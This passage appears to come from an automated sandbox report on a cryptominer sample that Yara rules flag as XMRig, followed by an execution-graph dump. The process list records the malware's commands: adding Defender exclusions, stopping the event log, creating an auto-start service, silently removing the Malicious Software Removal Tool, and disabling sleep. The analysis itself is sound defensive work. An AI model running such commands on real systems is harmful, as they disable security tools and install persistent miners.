                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe delete "QVYJPHJR"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff77a780000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe start "QVYJPHJR"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
                                                    Imagebase:0x7ff62d5f0000
                                                    File size:2'629'632 bytes
                                                    MD5 hash:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 63%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff705b20000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff77a780000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:38
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:svchost.exe
                                                    Imagebase:0x7ff67e6d0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:false


                                                      Execution Graph

                                                      Execution Coverage:3.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:12.4%
                                                      Total number of Nodes:1502
                                                      Total number of Limit Nodes:2
7ff67c751394 2 API calls 2963->2964 2965 7ff67c7514a9 2964->2965 2966 7ff67c7514b8 2965->2966 2967 7ff67c751394 2 API calls 2965->2967 2968 7ff67c751394 2 API calls 2966->2968 2967->2966 2969 7ff67c7514c2 2968->2969 2970 7ff67c7514c7 2969->2970 2971 7ff67c751394 2 API calls 2969->2971 2972 7ff67c751394 2 API calls 2970->2972 2971->2970 2973 7ff67c7514d6 2972->2973 2974 7ff67c751394 2 API calls 2973->2974 2975 7ff67c7514e0 2974->2975 2976 7ff67c7514e5 2975->2976 2977 7ff67c751394 2 API calls 2975->2977 2978 7ff67c751394 2 API calls 2976->2978 2977->2976 2979 7ff67c7514ef 2978->2979 2980 7ff67c7514f4 2979->2980 2981 7ff67c751394 2 API calls 2979->2981 2982 7ff67c751394 2 API calls 2980->2982 2981->2980 2983 7ff67c7514fe 2982->2983 2984 7ff67c751503 2983->2984 2985 7ff67c751394 2 API calls 2983->2985 2986 7ff67c751394 2 API calls 2984->2986 2985->2984 2987 7ff67c75150d 2986->2987 2988 7ff67c751394 2 API calls 2987->2988 2989 7ff67c751512 2988->2989 2990 7ff67c751394 2 API calls 2989->2990 2991 7ff67c751521 2990->2991 2992 7ff67c751394 2 API calls 2991->2992 2993 7ff67c751530 2992->2993 2994 7ff67c751394 2 API calls 2993->2994 2995 7ff67c75153f 2994->2995 2996 7ff67c751394 2 API calls 2995->2996 2997 7ff67c75154e 2996->2997 2998 7ff67c751394 2 API calls 2997->2998 2999 7ff67c75155d 2998->2999 3000 7ff67c751394 2 API calls 2999->3000 3001 7ff67c75156c 3000->3001 3002 7ff67c751394 2 API calls 3001->3002 3003 7ff67c75157b 3002->3003 3004 7ff67c751394 2 API calls 3003->3004 3005 7ff67c75158a 3004->3005 3006 7ff67c751394 2 API calls 3005->3006 3007 7ff67c751599 3006->3007 3008 7ff67c751394 2 API calls 3007->3008 3009 7ff67c7515a8 3008->3009 3010 7ff67c751394 2 API calls 3009->3010 3011 7ff67c7515b7 3010->3011 3012 7ff67c7515c6 3011->3012 3013 7ff67c751394 2 API calls 3011->3013 3014 7ff67c751394 2 API calls 3012->3014 3013->3012 3015 7ff67c7515d0 3014->3015 3016 7ff67c7515d5 3015->3016 3017 7ff67c751394 2 API calls 3015->3017 3018 7ff67c751394 2 API calls 3016->3018 
3017->3016 3019 7ff67c7515df 3018->3019 3020 7ff67c7515e4 3019->3020 3021 7ff67c751394 2 API calls 3019->3021 3022 7ff67c751394 2 API calls 3020->3022 3021->3020 3023 7ff67c7515f3 3022->3023 3023->2686 3505 7ff67c752660 3024->3505 3029 7ff67c75145e 2 API calls 3030 7ff67c752f35 3029->3030 3031 7ff67c752f53 3030->3031 3540 7ff67c751512 3030->3540 3033 7ff67c75145e 2 API calls 3031->3033 3034 7ff67c752f5d 3033->3034 3034->2834 3035 7ff67c752e3c 3507 7ff67c752690 3035->3507 3037 7ff67c751394 2 API calls 3036->3037 3038 7ff67c75147c 3037->3038 3039 7ff67c751394 2 API calls 3038->3039 3040 7ff67c75148b 3039->3040 3041 7ff67c751394 2 API calls 3040->3041 3042 7ff67c75149a 3041->3042 3043 7ff67c751394 2 API calls 3042->3043 3044 7ff67c7514a9 3043->3044 3045 7ff67c7514b8 3044->3045 3046 7ff67c751394 2 API calls 3044->3046 3047 7ff67c751394 2 API calls 3045->3047 3046->3045 3048 7ff67c7514c2 3047->3048 3049 7ff67c7514c7 3048->3049 3050 7ff67c751394 2 API calls 3048->3050 3051 7ff67c751394 2 API calls 3049->3051 3050->3049 3052 7ff67c7514d6 3051->3052 3053 7ff67c751394 2 API calls 3052->3053 3054 7ff67c7514e0 3053->3054 3055 7ff67c7514e5 3054->3055 3056 7ff67c751394 2 API calls 3054->3056 3057 7ff67c751394 2 API calls 3055->3057 3056->3055 3058 7ff67c7514ef 3057->3058 3059 7ff67c7514f4 3058->3059 3060 7ff67c751394 2 API calls 3058->3060 3061 7ff67c751394 2 API calls 3059->3061 3060->3059 3062 7ff67c7514fe 3061->3062 3063 7ff67c751503 3062->3063 3064 7ff67c751394 2 API calls 3062->3064 3065 7ff67c751394 2 API calls 3063->3065 3064->3063 3066 7ff67c75150d 3065->3066 3067 7ff67c751394 2 API calls 3066->3067 3068 7ff67c751512 3067->3068 3069 7ff67c751394 2 API calls 3068->3069 3070 7ff67c751521 3069->3070 3071 7ff67c751394 2 API calls 3070->3071 3072 7ff67c751530 3071->3072 3073 7ff67c751394 2 API calls 3072->3073 3074 7ff67c75153f 3073->3074 3075 7ff67c751394 2 API calls 3074->3075 3076 7ff67c75154e 3075->3076 3077 7ff67c751394 2 API calls 3076->3077 3078 7ff67c75155d 
3077->3078 3079 7ff67c751394 2 API calls 3078->3079 3080 7ff67c75156c 3079->3080 3081 7ff67c751394 2 API calls 3080->3081 3082 7ff67c75157b 3081->3082 3083 7ff67c751394 2 API calls 3082->3083 3084 7ff67c75158a 3083->3084 3085 7ff67c751394 2 API calls 3084->3085 3086 7ff67c751599 3085->3086 3087 7ff67c751394 2 API calls 3086->3087 3088 7ff67c7515a8 3087->3088 3089 7ff67c751394 2 API calls 3088->3089 3090 7ff67c7515b7 3089->3090 3091 7ff67c7515c6 3090->3091 3092 7ff67c751394 2 API calls 3090->3092 3093 7ff67c751394 2 API calls 3091->3093 3092->3091 3094 7ff67c7515d0 3093->3094 3095 7ff67c7515d5 3094->3095 3096 7ff67c751394 2 API calls 3094->3096 3097 7ff67c751394 2 API calls 3095->3097 3096->3095 3098 7ff67c7515df 3097->3098 3099 7ff67c7515e4 3098->3099 3100 7ff67c751394 2 API calls 3098->3100 3101 7ff67c751394 2 API calls 3099->3101 3100->3099 3102 7ff67c7515f3 3101->3102 3102->2728 3103 7ff67c751404 3102->3103 3104 7ff67c751394 2 API calls 3103->3104 3105 7ff67c751413 3104->3105 3106 7ff67c751394 2 API calls 3105->3106 3107 7ff67c751422 3106->3107 3108 7ff67c751394 2 API calls 3107->3108 3109 7ff67c751431 3108->3109 3110 7ff67c751394 2 API calls 3109->3110 3111 7ff67c751440 3110->3111 3112 7ff67c751394 2 API calls 3111->3112 3113 7ff67c75144f 3112->3113 3114 7ff67c751394 2 API calls 3113->3114 3115 7ff67c75145e 3114->3115 3116 7ff67c751394 2 API calls 3115->3116 3117 7ff67c75146d 3116->3117 3118 7ff67c751394 2 API calls 3117->3118 3119 7ff67c75147c 3118->3119 3120 7ff67c751394 2 API calls 3119->3120 3121 7ff67c75148b 3120->3121 3122 7ff67c751394 2 API calls 3121->3122 3123 7ff67c75149a 3122->3123 3124 7ff67c751394 2 API calls 3123->3124 3125 7ff67c7514a9 3124->3125 3126 7ff67c7514b8 3125->3126 3127 7ff67c751394 2 API calls 3125->3127 3128 7ff67c751394 2 API calls 3126->3128 3127->3126 3129 7ff67c7514c2 3128->3129 3130 7ff67c7514c7 3129->3130 3131 7ff67c751394 2 API calls 3129->3131 3132 7ff67c751394 2 API calls 3130->3132 3131->3130 3133 7ff67c7514d6 3132->3133 
3134 7ff67c751394 2 API calls 3133->3134 3135 7ff67c7514e0 3134->3135 3136 7ff67c7514e5 3135->3136 3137 7ff67c751394 2 API calls 3135->3137 3138 7ff67c751394 2 API calls 3136->3138 3137->3136 3139 7ff67c7514ef 3138->3139 3140 7ff67c7514f4 3139->3140 3141 7ff67c751394 2 API calls 3139->3141 3142 7ff67c751394 2 API calls 3140->3142 3141->3140 3143 7ff67c7514fe 3142->3143 3144 7ff67c751503 3143->3144 3145 7ff67c751394 2 API calls 3143->3145 3146 7ff67c751394 2 API calls 3144->3146 3145->3144 3147 7ff67c75150d 3146->3147 3148 7ff67c751394 2 API calls 3147->3148 3149 7ff67c751512 3148->3149 3150 7ff67c751394 2 API calls 3149->3150 3151 7ff67c751521 3150->3151 3152 7ff67c751394 2 API calls 3151->3152 3153 7ff67c751530 3152->3153 3154 7ff67c751394 2 API calls 3153->3154 3155 7ff67c75153f 3154->3155 3156 7ff67c751394 2 API calls 3155->3156 3157 7ff67c75154e 3156->3157 3158 7ff67c751394 2 API calls 3157->3158 3159 7ff67c75155d 3158->3159 3160 7ff67c751394 2 API calls 3159->3160 3161 7ff67c75156c 3160->3161 3162 7ff67c751394 2 API calls 3161->3162 3163 7ff67c75157b 3162->3163 3164 7ff67c751394 2 API calls 3163->3164 3165 7ff67c75158a 3164->3165 3166 7ff67c751394 2 API calls 3165->3166 3167 7ff67c751599 3166->3167 3168 7ff67c751394 2 API calls 3167->3168 3169 7ff67c7515a8 3168->3169 3170 7ff67c751394 2 API calls 3169->3170 3171 7ff67c7515b7 3170->3171 3172 7ff67c7515c6 3171->3172 3173 7ff67c751394 2 API calls 3171->3173 3174 7ff67c751394 2 API calls 3172->3174 3173->3172 3175 7ff67c7515d0 3174->3175 3176 7ff67c7515d5 3175->3176 3177 7ff67c751394 2 API calls 3175->3177 3178 7ff67c751394 2 API calls 3176->3178 3177->3176 3179 7ff67c7515df 3178->3179 3180 7ff67c7515e4 3179->3180 3181 7ff67c751394 2 API calls 3179->3181 3182 7ff67c751394 2 API calls 3180->3182 3181->3180 3183 7ff67c7515f3 3182->3183 3183->2733 3185 7ff67c751394 2 API calls 3184->3185 3186 7ff67c75158a 3185->3186 3187 7ff67c751394 2 API calls 3186->3187 3188 7ff67c751599 3187->3188 3189 7ff67c751394 2 API calls 
3188->3189 3190 7ff67c7515a8 3189->3190 3191 7ff67c751394 2 API calls 3190->3191 3192 7ff67c7515b7 3191->3192 3193 7ff67c7515c6 3192->3193 3194 7ff67c751394 2 API calls 3192->3194 3195 7ff67c751394 2 API calls 3193->3195 3194->3193 3196 7ff67c7515d0 3195->3196 3197 7ff67c7515d5 3196->3197 3198 7ff67c751394 2 API calls 3196->3198 3199 7ff67c751394 2 API calls 3197->3199 3198->3197 3200 7ff67c7515df 3199->3200 3201 7ff67c7515e4 3200->3201 3202 7ff67c751394 2 API calls 3200->3202 3203 7ff67c751394 2 API calls 3201->3203 3202->3201 3204 7ff67c7515f3 3203->3204 3204->2744 3205 7ff67c75158a 3204->3205 3206 7ff67c751394 2 API calls 3205->3206 3207 7ff67c751599 3206->3207 3208 7ff67c751394 2 API calls 3207->3208 3209 7ff67c7515a8 3208->3209 3210 7ff67c751394 2 API calls 3209->3210 3211 7ff67c7515b7 3210->3211 3212 7ff67c7515c6 3211->3212 3213 7ff67c751394 2 API calls 3211->3213 3214 7ff67c751394 2 API calls 3212->3214 3213->3212 3215 7ff67c7515d0 3214->3215 3216 7ff67c7515d5 3215->3216 3217 7ff67c751394 2 API calls 3215->3217 3218 7ff67c751394 2 API calls 3216->3218 3217->3216 3219 7ff67c7515df 3218->3219 3220 7ff67c7515e4 3219->3220 3221 7ff67c751394 2 API calls 3219->3221 3222 7ff67c751394 2 API calls 3220->3222 3221->3220 3223 7ff67c7515f3 3222->3223 3223->2744 3225 7ff67c751394 2 API calls 3224->3225 3226 7ff67c7515f3 3225->3226 3226->2745 3228 7ff67c751394 2 API calls 3227->3228 3229 7ff67c7515b7 3228->3229 3230 7ff67c7515c6 3229->3230 3231 7ff67c751394 2 API calls 3229->3231 3232 7ff67c751394 2 API calls 3230->3232 3231->3230 3233 7ff67c7515d0 3232->3233 3234 7ff67c7515d5 3233->3234 3235 7ff67c751394 2 API calls 3233->3235 3236 7ff67c751394 2 API calls 3234->3236 3235->3234 3237 7ff67c7515df 3236->3237 3238 7ff67c7515e4 3237->3238 3239 7ff67c751394 2 API calls 3237->3239 3240 7ff67c751394 2 API calls 3238->3240 3239->3238 3241 7ff67c7515f3 3240->3241 3241->2763 3241->2764 3243 7ff67c751394 2 API calls 3242->3243 3244 7ff67c75153f 3243->3244 3245 7ff67c751394 2 API 
